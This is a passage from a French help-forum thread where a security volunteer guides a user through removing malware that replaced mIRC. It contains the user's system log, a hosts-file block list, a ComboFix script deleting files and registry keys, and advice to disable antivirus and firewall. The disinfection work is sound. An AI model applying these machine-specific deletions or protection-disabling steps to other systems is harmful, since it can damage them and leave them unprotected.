    Mise à jour de sécurité pour Windows XP (KB956841)-->"C:\WINDOWS\$NtUninstallKB956841$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB957095)-->"C:\WINDOWS\$NtUninstallKB957095$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB957097)-->"C:\WINDOWS\$NtUninstallKB957097$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB958644)-->"C:\WINDOWS\$NtUninstallKB958644$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB958687)-->"C:\WINDOWS\$NtUninstallKB958687$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB958690)-->"C:\WINDOWS\$NtUninstallKB958690$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB960225)-->"C:\WINDOWS\$NtUninstallKB960225$\spuninst\spuninst.exe"
    Mise à jour de sécurité pour Windows XP (KB960715)-->"C:\WINDOWS\$NtUninstallKB960715$\spuninst\spuninst.exe"
    Mise à jour pour Windows XP (KB898461)-->"C:\WINDOWS\$NtUninstallKB898461$\spuninst\spuninst.exe"
    Mise à jour pour Windows XP (KB942763)-->"C:\WINDOWS\$NtUninstallKB942763$\spuninst\spuninst.exe"
    Mise à jour pour Windows XP (KB951072-v2)-->"C:\WINDOWS\$NtUninstallKB951072-v2$\spuninst\spuninst.exe"
    Mise à jour pour Windows XP (KB951978)-->"C:\WINDOWS\$NtUninstallKB951978$\spuninst\spuninst.exe"
    Mise à jour pour Windows XP (KB955839)-->"C:\WINDOWS\$NtUninstallKB955839$\spuninst\spuninst.exe"
    Mise à jour pour Windows XP (KB967715)-->"C:\WINDOWS\$NtUninstallKB967715$\spuninst\spuninst.exe"
    Mozilla Firefox (3.0.7)-->C:\Logs\Mozilla Firefox\uninstall\helper.exe
    MSVC80_x86-->MsiExec.exe /I{212748BB-0DA5-46DE-82A1-403736DC9F27}
    MSVCRT-->MsiExec.exe /I{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}
    MSXML 4.0 SP2 (KB936181)-->MsiExec.exe /I{C04E32E0-0416-434D-AFB9-6969D703A9EF}
    MSXML 4.0 SP2 (KB954430)-->MsiExec.exe /I{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}
    MSXML 6.0 Parser-->MsiExec.exe /I{A43BF6A5-D5F0-4AAA-BF41-65995063EC44}
    Mumble and Murmur-->C:\Logs\Mumble2\Uninstall.exe
    Nero 7 Essentials-->MsiExec.exe /X{1C00A3F1-6DA0-49F8-94E4-01AB6FC01036}
    NewBlue Art Effects-->C:\Logs\Vegas Pro 8.0\Video Plug-Ins\Uninstal.exe
    NewBlue Motion Effects-->C:\Logs\Vegas Pro 8.0\Video Plug-Ins\Uninstal.exe
    Nokia Connectivity Cable Driver-->MsiExec.exe /X{15AC0C5D-A6FB-4CE2-8CD0-28179EEB5625}
    Nokia Flashing Cable Driver-->MsiExec.exe /X{A4E0CA0F-1903-440A-9B98-FEA6CB049999}
    Nokia PC Suite-->C:\Documents and Settings\All Users\Application Data\Installations\{58FB2F9A-5F2D-40E8-82DF-4987E60AD8BD}\Nokia_PC_Suite_7_1_18_0_fre.exe
    Nokia PC Suite-->MsiExec.exe /I{58FB2F9A-5F2D-40E8-82DF-4987E60AD8BD}
    Nokia Software Updater-->MsiExec.exe /X{5D19E730-D3C6-47F4-AE4B-DCB26EC2D905}
    NVIDIA Drivers-->C:\WINDOWS\system32\nvuninst.exe UninstallGUI
    NVIDIA PhysX v8.10.17-->MsiExec.exe /X{E4D15328-8C89-484B-B9AA-F5BE9EA6D01C}
    OpenAL-->"C:\Program Files\OpenAL\oalinst.exe" /U
    Outil de téléchargement Windows Live-->MsiExec.exe /I{205C6BDD-7B73-42DE-8505-9A093F35A238}
    Package de pilotes Windows - Nokia Modem  (03/05/2008 3.7)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokia_blue_635B28EFCFA9395123BB1C251595CB16129E2560\nokia_bluetooth.inf
    Package de pilotes Windows - Nokia Modem  (03/13/2008 6.86.0.1)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokbtmdm_28F2EAC406838DA65AFF6C6886FE9FE96AEF5186\nokbtmdm.inf
    Package de pilotes Windows - Nokia Modem  (05/22/2008 3.8)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokia_blue_6F90B0F4A73A2F780A1010B5D6CB5DDFB098181E\nokia_bluetooth.inf
    Package de pilotes Windows - Nokia Modem  (05/22/2008 7.00.0.1)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokbtmdm_E68D50F7E25BFE399D47C864C3B52557346242A9\nokbtmdm.inf
    Package de pilotes Windows - Nokia Modem  (10/27/2008 3.9)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokia_blue_79486EC6AA0D1732FB17E5167077C07ECAE1B870\nokia_bluetooth.inf
    Package de pilotes Windows - Nokia Modem  (10/27/2008 7.01.0.1)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\nokbtmdm_247189AEBF39EB69A7C75429610DFED2F2EDC1B6\nokbtmdm.inf
    Package de pilotes Windows - Nokia pccsmcfd  (08/22/2008 7.0.0.0)-->C:\PROGRA~1\DIFX\270581355A767BF1\dpinst.exe /u C:\WINDOWS\system32\DRVSTORE\pccsmcfd_A3B3916E5D8138F59EE218321B27B044D3B18294\pccsmcfd.inf
    PC Connectivity Solution-->MsiExec.exe /I{D848D140-41C3-4A53-86D8-E866A100B4CD}
    PeerGuardian 2.0-->"C:\Logs\PeerGuardian2\unins000.exe"
    Penumbra Black Plague-->"V:\Penumbra\Penumbra Black Plague\unins000.exe"
    Penumbra Episode 1-->"V:\Penumbra\Episode 1\unins000.exe"
    PoiZone-->C:\Program Files\Image-Line\PoiZone\uninstall.exe
    Prince of Persia-->"C:\Program Files\InstallShield Installation Information\{7C11154F-3539-4CB5-979D-EF7913473E53}\setup.exe" -runfromtemp -l0x040c -removeonly
    Pro Tools Demo Sessions-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\engine\6\INTEL3~1\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{80961F79-CD86-4416-9684-A0C28F96823E}\Setup.exe" -l0x9 
    ProtectDisc Driver, Version 11-->C:\Program Files\ProtectDisc Driver Installer\uninstall_v11.exe
    PrtScr 1.0-->"C:\Logs\PrtScr\unins000.exe"
    QuickTime Alternative 1.78-->"C:\Logs\QuickTime Alternative\unins000.exe"
    QuickTime-->MsiExec.exe /I{216AB108-2AE1-4130-B3D5-20B2C4C80F8F}
    Radiance for Vegas Pro 8.0-->MsiExec.exe /I{D0C980B8-012F-4E9A-B090-07038008ACD0}
    Real Alternative 1.51 Lite-->"C:\Logs\Real Alternative\unins000.exe"
    Reason 3.0-->"P:\Reason\Uninstall Reason\unins000.exe"
    Ri4m v5.0.1d-->C:\Logs\Ripp-it_AM\Ri4m_Uninstal.exe
    Ripp-It Codec Pack v 4.2.6-->C:\Logs\Ripp-It Codec Pack\uninst.exe
    Security Update for 2007 Microsoft Office System (KB951550)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {B243E9A5-ED77-4F1B-B338-2486FD82DC85}
    Security Update for 2007 Microsoft Office System (KB951944)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {797AE457-BA17-4BBC-B501-25FB3A0103C7}
    Security Update for 2007 Microsoft Office System (KB958439)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {6491B8AA-D11C-4648-A461-6234B31EB7E2}
    Security Update for Microsoft Office Excel 2007 (KB958437)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {648FC016-2D6B-4A16-8D87-404533642F4B}
    Security Update for Microsoft Office PowerPoint 2007 (KB951338)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {558B709B-821B-4FC5-90FC-9A8890641E77}
    Security Update for Microsoft Office Publisher 2007 (KB950114)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {F9C3CDBA-1F00-4D4D-959D-75C9D3ACDD85}
    Security Update for Microsoft Office system 2007 (KB954326)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {5F7F6FFF-395D-480E-8450-64F385D82C5F}
    Security Update for Microsoft Office system 2007 (KB956828)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {885E081B-72BD-4E76-8E98-30B4BE468FAC}
    Security Update for Microsoft Office Word 2007 (KB956358)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {4551666D-0FD6-4C69-8A81-1C6F2E64517C}
    Security Update pour Microsoft .NET Framework 2.0 (KB928365)-->C:\WINDOWS\system32\msiexec.exe /promptrestart /uninstall {8056AC9E-49C5-4375-9ADE-B2F862C9DF51} /package {7131646D-CD3C-40F4-97B9-CD9E4E6262EF}
    Segoe UI-->MsiExec.exe /I{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}
    ShaunWhiteSnowboarding-->"C:\Program Files\InstallShield Installation Information\{2E52FB79-7F60-4AD7-B946-5ED18B4F274E}\Setup.exe" -runfromtemp -l0x040c -removeonly
    Skype™ 4.0-->MsiExec.exe /X{24D753CA-6AE9-4E30-8F5F-EFC93E08BF3D}
    SONIC ADVENTURE DX-Director's Cut-->V:\Sonic adventure DX\SONICADVENTUREDX\unsetup.exe
    Sony Media Manager 2.3-->MsiExec.exe /X{8FA5B6B7-D8BD-49F7-98D7-701C26B01E97}
    Sony Vegas Pro 8.0-->MsiExec.exe /X{1246FF64-3035-4A92-8FE6-A968275495EB}
    Source SDK Base - Orange Box-->"V:\Steam\steam.exe" steam://uninstall/218
    Spybot - Search & Destroy-->"C:\Logs\Spybot - Search & Destroy\unins000.exe"
    SuperCopier2-->"C:\Logs\SuperCopier2\SC2Uninst.exe"
    TeamSpeak 2 RC2-->C:\Logs\Teamspeak2_RC2\unins000.exe
    Toxic Biohazard-->C:\Program Files\Image-Line\Toxic Biohazard\uninstall.exe
    Tunatic-->"C:\WINDOWS\lsb_un20.exe" /C=UC /N=Tunatic
    Twin USB Vibration Gamepad-->RunDll32 C:\PROGRA~1\FICHIE~1\INSTAL~1\PROFES~1\RunTime\0700\Intel32\Ctor.dll,LaunchSetup "C:\Program Files\InstallShield Installation Information\{BA12FD6D-169A-11D7-A6A9-00C026281E5A}\setup.exe" -l0x9 
    Update for Microsoft Office Outlook 2007 (KB952142)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {4AD3A076-427C-491F-A5B7-7D1DE788A756}
    Update for Office 2007 (KB946691)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {A420F522-7395-4872-9882-C591B4B92278}
    Update for Outlook 2007 Junk Email Filter (kb962871)-->msiexec /package {90120000-0011-0000-0000-0000000FF1CE} /uninstall {297857BF-4011-449B-BD74-DB64D182821C}
    Ventrilo-->MsiExec.exe /I{789289CA-F73A-4A16-A331-54D498CE069F}
    VLC media player 0.9.6-->C:\Logs\VLC\uninstall.exe
    Winamp Remote-->"C:\Logs\Winamp Remote\uninstall.exe"
    Winamp-->"C:\Logs\Winamp\UninstWA.exe"
    Windows Communication Foundation-->MsiExec.exe /X{491DD792-AD81-429C-9EB4-86DD3D22E333}
    Windows Internet Explorer 7-->"C:\WINDOWS\ie7\spuninst\spuninst.exe"
    Windows Live Call-->MsiExec.exe /I{82C7B308-0BDD-49D8-8EA5-9CD3A3F9DF41}
    Windows Live Communications Platform-->MsiExec.exe /I{3B4E636E-9D65-4D67-BA61-189800823F52}
    Windows Live Messenger-->MsiExec.exe /X{059C042E-796A-4ACC-A81A-ECC2010BB78C}
    Windows Media Format 11 runtime-->"C:\Program Files\Windows Media Player\wmsetsdk.exe" /UninstallAll
    Windows Media Format 11 runtime-->"C:\WINDOWS\$NtUninstallWMFDist11$\spuninst\spuninst.exe"
    Windows Media Player 11-->"C:\WINDOWS\$NtUninstallwmp11$\spuninst\spuninst.exe"
    Windows Presentation Foundation-->MsiExec.exe /X{BAF78226-3200-4DB4-BE33-4D922A799840}
    Windows Workflow Foundation-->MsiExec.exe /I{7D1B85BD-AA07-48B8-808D-67A4067FC6BD}
    Windows XP Service Pack 3-->"C:\WINDOWS\$NtServicePackUninstall$\spuninst\spuninst.exe"
    WinDriver Ghost Enterprise 2.05-->C:\Logs\WINDRI~1\UNWISE.EXE C:\Logs\WINDRI~1\INSTALL.LOG
    WinPcap 4.0.2-->C:\Program Files\WinPcap\uninstall.exe
    x264 Revision 573 x264.nl (remove only)-->"C:\Logs\x264\x264-uninstall.exe"
    Xvid 1.1.3 final uninstall-->"C:\Logs\Xvid\unins000.exe"
    Zenoté Blur for Vegas-->MsiExec.exe /X{86CC41E6-A4F5-448E-97DC-A9F254193EC7}
    Zenoté Glow for Vegas-->MsiExec.exe /X{F3A15FE0-A67B-4E05-853A-46851EAEFBF0}
    Zenoté Grain for Vegas-->MsiExec.exe /X{D428F260-DF6E-4D5A-9C8D-5C45CC209FAD}
    Zenoté Letterbox for Vegas-->MsiExec.exe /X{8C40E19E-176A-4B42-AD7B-C472AEC6704F}
    
    ======Hosts File======
    
    127.0.0.1	www.007guard.com
    127.0.0.1	007guard.com
    127.0.0.1	008i.com
    127.0.0.1	www.008k.com
    127.0.0.1	008k.com
    127.0.0.1	www.00hq.com
    127.0.0.1	00hq.com
    127.0.0.1	010402.com
    127.0.0.1	www.032439.com
    127.0.0.1	032439.com
    
    ======Security center information======
    
    AV: AVG Anti-Virus
    
    System event log
    
    Computer Name: LMLMIKE
    Event Code: 18
    Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
    - Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
    - Mise à jour de sécurité pour Windows XP (KB954600)
    - Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
    - Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)
    - Mise à jour de sécurité pour Microsoft Office Word 2007 (KB956358)
    - Mise à jour de sécurité cumulative pour Internet Explorer 7 pour Windows XP (KB958215)
    - Mise à jour de sécurité pour Microsoft Office Excel 2007 (KB958437)
    - Mise à jour de sécurité pour Microsoft Office System 2007 (KB958439)
    
    Record Number: 3427
    Source Name: Windows Update Agent
    Time Written: 20081212050948.000000+060
    Event Type: Informations
    User: 
    
    Computer Name: LMLMIKE
    Event Code: 18
    Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
    - Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
    - Mise à jour de sécurité pour Windows XP (KB954600)
    - Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
    - Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)
    - Mise à jour de sécurité pour Microsoft Office Word 2007 (KB956358)
    - Mise à jour de sécurité cumulative pour Internet Explorer 7 pour Windows XP (KB958215)
    - Mise à jour de sécurité pour Microsoft Office Excel 2007 (KB958437)
    
    Record Number: 3426
    Source Name: Windows Update Agent
    Time Written: 20081212050935.000000+060
    Event Type: Informations
    User: 
    
    Computer Name: LMLMIKE
    Event Code: 18
    Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
    - Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
    - Mise à jour de sécurité pour Windows XP (KB954600)
    - Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
    - Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)
    - Mise à jour de sécurité pour Microsoft Office Word 2007 (KB956358)
    - Mise à jour de sécurité cumulative pour Internet Explorer 7 pour Windows XP (KB958215)
    
    Record Number: 3425
    Source Name: Windows Update Agent
    Time Written: 20081212050923.000000+060
    Event Type: Informations
    User: 
    
    Computer Name: LMLMIKE
    Event Code: 18
    Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
    - Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
    - Mise à jour de sécurité pour Windows XP (KB954600)
    - Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
    - Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)
    - Mise à jour de sécurité pour Microsoft Office Word 2007 (KB956358)
    
    Record Number: 3424
    Source Name: Windows Update Agent
    Time Written: 20081212050858.000000+060
    Event Type: Informations
    User: 
    
    Computer Name: LMLMIKE
    Event Code: 18
    Message: Prêt pour l'installation : les mises à jour suivantes ont été téléchargées et sont prêtes pour l'installation. L'installation de ces mises à jour est actuellement planifiée pour le samedi 13 décembre 2008 à 03:00 : 
    - Mise à jour de sécurité pour Microsoft Office System 2007 (KB956828)
    - Mise à jour de sécurité pour Windows XP (KB954600)
    - Mise à jour pour le filtre de courrier indésirable de Microsoft Office Outlook 2007 (KB958619)
    - Mise à jour de sécurité pour Windows XP Service Pack 3 (KB952069)
    
    Record Number: 3423
    Source Name: Windows Update Agent
    Time Written: 20081212050844.000000+060
    Event Type: Informations
    User: 
    
    Application event log
    
    Computer Name: LMLMIKE
    Event Code: 700
    Message: msnmsgr (468) La défragmentation en ligne commence un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.
    
    Record Number: 14694
    Source Name: ESENT
    Time Written: 20090117090012.000000+060
    Event Type: Informations
    User: 
    
    Computer Name: LMLMIKE
    Event Code: 701
    Message: msnmsgr (468) La défragmentation en ligne a terminé un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.
    
    Record Number: 14693
    Source Name: ESENT
    Time Written: 20090117080012.000000+060
    Event Type: Informations
    User: 
    
    Computer Name: LMLMIKE
    Event Code: 700
    Message: msnmsgr (468) La défragmentation en ligne commence un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.
    
    Record Number: 14692
    Source Name: ESENT
    Time Written: 20090117080012.000000+060
    Event Type: Informations
    User: 
    
    Computer Name: LMLMIKE
    Event Code: 701
    Message: msnmsgr (468) La défragmentation en ligne a terminé un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.
    
    Record Number: 14691
    Source Name: ESENT
    Time Written: 20090117070012.000000+060
    Event Type: Informations
    User: 
    
    Computer Name: LMLMIKE
    Event Code: 700
    Message: msnmsgr (468) La défragmentation en ligne commence un passage complet dans la base de données '\\.\C:\Documents and Settings\lml-mike\Local Settings\Application Data\Microsoft\Messenger\lml-mike@hotmail.fr\SharingMetadata\Working\database_3A20_907D_2090_4235\dfsr.db'.
    
    Record Number: 14690
    Source Name: ESENT
    Time Written: 20090117070012.000000+060
    Event Type: Informations
    User: 
    
    ======Environment variables======
    
    "ComSpec"=%SystemRoot%\system32\cmd.exe
    "Path"=C:\Program Files\PC Connectivity Solution\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Microsoft SQL Server\90\Tools\binn\;C:\Logs\Diskeeper\;C:\Program Files\Fichiers communs\Autodesk Shared\;V:\Logs\backburner\;C:\Program Files\Fichiers communs\Adobe\AGL;C:\Logs\QuickTime Alternative\QTSystem\;C:\Program Files\Fichiers communs\GIS\Tools
    "windir"=%SystemRoot%
    "FP_NO_HOST_CHECK"=NO
    "OS"=Windows_NT
    "PROCESSOR_ARCHITECTURE"=x86
    "PROCESSOR_LEVEL"=6
    "PROCESSOR_IDENTIFIER"=x86 Family 6 Model 15 Stepping 6, GenuineIntel
    "PROCESSOR_REVISION"=0f06
    "NUMBER_OF_PROCESSORS"=2
    "PATHEXT"=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
    "TEMP"=%SystemRoot%\TEMP
    "TMP"=%SystemRoot%\TEMP
    "sourcesdk"=v:\steam\steamapps\lml_mike@hotmail.com\sourcesdk
    "VProject"=v:\steam\steamapps\lml_mike@hotmail.com\half-life 2 episode two\ep2
    "CLASSPATH"=.;C:\Program Files\Java\jre6\lib\ext\QTJava.zip
    "QTJAVA"=C:\Program Files\Java\jre6\lib\ext\QTJava.zip
    
    -----------------EOF-----------------
    
    0
  11. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Re,

    Déconnecte toi d'Internet.

    Désinstalle mIRC via le Panneau de configuration.

    ===============
    Copie ou imprime les instructions avant

    Déconnecte toi d'internet et ferme toutes tes applications.

    Désactive tes protections (antivirus, parefeu, garde en temps réel de l'antispyware)

    Crée un nouveau document texte : clic droit de souris sur le bureau > Nouveau > Document Texte, et copie dedans les lignes suivantes :

    KillAll::

    File::
    c:\windows\NAVIGMA.INI
    c:\windows\system32\antbve.dll
    c:\windows\Winend\scan.dll
    c:\windowsWinend\script.dll
    c:\windowsWinend\serv.dll

    folder::
    c:\windows\Winend

    Registry::
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
    "AppInit_DLLs"=""
    [HKEY_CURRENT_USER\Software\Classes\irc\Shell\open\command]
    (Default) = ""
    [HKEY_CURRENT_USER\Software\Classes\irc\DefaultIcon]
    (Default) = ""

    [-HKEY_CURRENT_USER\Software\Classes\.cha]
    [-HKEY_CURRENT_USER\Software\Classes\.chat]
    [-HKEY_CURRENT_USER\Software\Classes\ChatFile]
    [HKEY_CURRENT_USER\Software\Classes\irc\Shell\open\ddeexec]

    Enregistre ce fichier sous le nom CFscript

    Fait un glisser/déposer de ce fichier CFscript sur le fichier ComboFix.exe

    Clique sur le fichier CFscript, maintient le doigt enfoncé et glisse la souris pour que l'icône du CFscrïpt vienne recouvrir l'icône de Combofix. Relache la souris. Combofix va démarrer.

    Patiente le temps du scan.Le bureau va disparaître à plusieurs reprises: c'est normal!

    Ne touche à rien tant que le scan n'est pas terminé.

    Réactive ton parefeu, ton antivirus, la garde de ton antispyware

    Une fois le scan achevé, un rapport va s'afficher: poste son contenu.

    Remets aussi un rapport Hijackthis

    Si le fichier ne s'ouvre pas, il se trouve ici > C:\ComboFix.txt

    Attention : cette manip a été fait pour cet ordi. Tout réutilisation peut endommager sévèrement le système d'exploitation.
    0
  12. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    J'utilise IRC réguilièrement, je dois quand même le désinstaller ?
    0
  13. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Re,

    quel client irc tu utilises ?
    0
  14. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    re,

    J'utilise la version 6.35, non payante.

    J'ai un avertissement comme quoi l'évaluation est expirée, mais en cliquant sur continue et en attendant 5 secondes ça lance quand même le soft :)
    0
  15. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Bonjour,

    as tu encore l'installateur de cette version ?

    Si oui, je crois qu'il vaut mieux désinstaller puis réinstaller.

    Il me semble que le malware a écrasé ta version au profit de la sienne (tout semble lié à winend et non soit logs soit documents and settings)
    0
  16. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    Ah...

    Ben je vais essayer de voir au moins pour garder mon perform, la liste de mes serveurs, mes favoris et mes scripts, et réinstaller IRC.
    0
  17. Lyonnais92 Messages postés 25708 Statut Contributeur sécurité 1 537
     
    Bonjour,

    ne va pas trop vite, je dois pouvoir t'aider, mais il me faut un peu de délai.

    Déjà fais ceci (si pas trop tard) :

    Télécharge OAD http://sosvirus.changelog.fr/OAD.exe
    - Enregistre le sur ton Bureau

    Double clique sur le OAD pour le lancer

    - nom de fichier à rechercher tape ou fais un copier coller de :
    mIRC

    - Type de recherche : sélectionne l'option 6 puis valide [entree]

    OAD va maintenant rechercher le fichier. Laisse le travailler jusqu'à ce qu'il en ai terminé.
    Le rapport de recherche s'affichera automatiquement à dès qu'il en aura terminé.

    - Fais un copier / coller de ce rapport dans ton prochain post.

    Note importante : Suivant la taille des disques dur cette recherche peut prendre plusieurs minutes. Sois patient(e)
    0
  18. lml-mike Messages postés 449 Date d'inscription   Statut Contributeur Dernière intervention   123
     
    J'ai pu m'occuper en attendant :)

    Voici le rapport :

     18/03/2009 ---- 11:19:05,54  
    
    ----------------------------------
    §§§§§§ [mIRC] §§§§§§
    ----------------------------------
    [X] Registre
     
    -------------- [  ] rapide
    -- Fichier --- [  ] disque systeme
     ------------- [X] complete
    
    
    ********************
         [Registre] 
    ********************
    
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Management\ARPCache\mIRC]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com\www]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com\www]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
    "DisplayIcon"="C:\\WINDOWS\\Winend\\mirc.exe"
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
    "DisplayName"="mIRC"
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
    "Publisher"="mIRC Co. Ltd."
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
    "URLUpdateInfo"="https://www.mirc.com/"
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
    "UninstallString"="\"C:\\WINDOWS\\Winend\\mirc.exe\" -uninstall"
    
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mIRC]
    "InstallLocation"="C:\\Logs\\mIRC"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\\Logs\\mIRC\\mirc.exe"="C:\\Logs\\mIRC\\mirc.exe:*:Enabled:mIRC"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\\WINDOWS\\Winend\\mirc.exe"="C:\\WINDOWS\\Winend\\mirc.exe:*:Disabled:mIRC"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\\Logs\\mIRC\\mirc.exe"="C:\\Logs\\mIRC\\mirc.exe:*:Enabled:mIRC"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\\WINDOWS\\Winend\\mirc.exe"="C:\\WINDOWS\\Winend\\mirc.exe:*:Disabled:mIRC"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\\Logs\\mIRC\\mirc.exe"="C:\\Logs\\mIRC\\mirc.exe:*:Enabled:mIRC"
    
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\\WINDOWS\\Winend\\mirc.exe"="C:\\WINDOWS\\Winend\\mirc.exe:*:Disabled:mIRC"
    
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com]
    
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\mircosoftantispy.com\www]
    
    [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains\mircosoftantispy.com]
    
